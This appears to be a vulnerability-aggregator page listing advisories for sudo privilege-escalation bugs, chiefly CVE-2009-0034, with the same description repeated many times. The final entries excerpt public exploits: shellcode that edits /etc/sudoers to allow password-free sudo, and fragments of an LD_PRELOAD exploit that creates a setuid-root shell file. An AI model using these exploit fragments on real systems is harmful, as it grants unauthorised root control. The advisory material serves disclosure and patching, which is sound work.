[SECURITY] Fedora 10 Update: sudo-1.6.9p17-5.fc10

Sudo superuser do allows a system administrator to give certain users or groups of users the ability to run some or all commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict...

sudo security update

1.6.9p17-3.el53.1 - audit patch rediff one chunk failed to apply due to fuzz=0 - Fix for incorrect handling of groups in RunasUser 481720 Resolves: 481820...

sudo -- certain authorized users could run commands as any user

Todd Miller reports: A bug was introduced in Sudo's group matching code in version 1.6.9 when support for matching based on the supplemental group vector was added. This bug may allow certain users listed in the sudoers file to run a command as a different user than their access rule specifies...

sudo privilege escalation

It's possible to elevate privileges to root even if configured to run under different account...

rPSA-2009-0021-1 sudo

rPath Security Advisory: 2009-0021-1 Published: 2009-01-29 Products: rPath Linux 2 Rating: Major Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: sudo=conary.rpath.com@rpl:2/1.6.9p12-3.1-1 rPath Issue Tracking System:...

CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

Authorization

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

DEBIAN-CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

CVE-2009-0034

CVE-2009-0034 affects sudo 1.6.9p17–1.6.9p19; parse.c does not properly interpret a system group (%group) in the sudoers file during authorization for a user in that group, enabling local users to gain root privileges via sudo. This is a local privilege escalation vulnerability. The connected Nes...

CVE-2009-0034

parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group aka %group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command...

PT-2009-1078 · Sudo +1 · Sudo +1

Name of the Vulnerable Software and Affected Versions: sudo versions 1.6.9p17 through 1.6.9p19 Description: The issue concerns the improper interpretation of a system group in the sudoers file during authorization decisions for users belonging to that group. This allows local users to leverage an...

openSUSE 10 Security Update : sudo (sudo-5962)

This update of sudo fixes a bug that allowed - depending on the sudoers rules - a sudo-user to execute arbitrary shell commands as root. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update...

linux/x86 - edit /etc/sudoers for full access 86 bytes

linux/x86 edit /etc/sudoers for full access 86 bytes. Shellcode exploit for linx86 platform / Author: Rick Email: [email protected] OS: Linux/x86 Description: Anyone can run sudo without password section .text global start start: ;open"/etc/sudoers", OWRONLY | OAPPEND; xor eax, eax push eax pu...

sudo-local.txt

!/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL; EOF cat xxxx.c EOF int mainvoid setgid0; setuid0; //...

Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit

No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- "Defaults setenv" so environ vars are preserved : --- May also need the current users password to be...

Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit

Exploit for multiple platform in category local exploits ===================================================================== Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0;...

Sudo 1.6.9p18 - &#039;Defaults SetEnv&#039; Local Privilege Escalation

!/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL; EOF cat xxxx.c EOF int mainvoid setgid0; setuid0; //...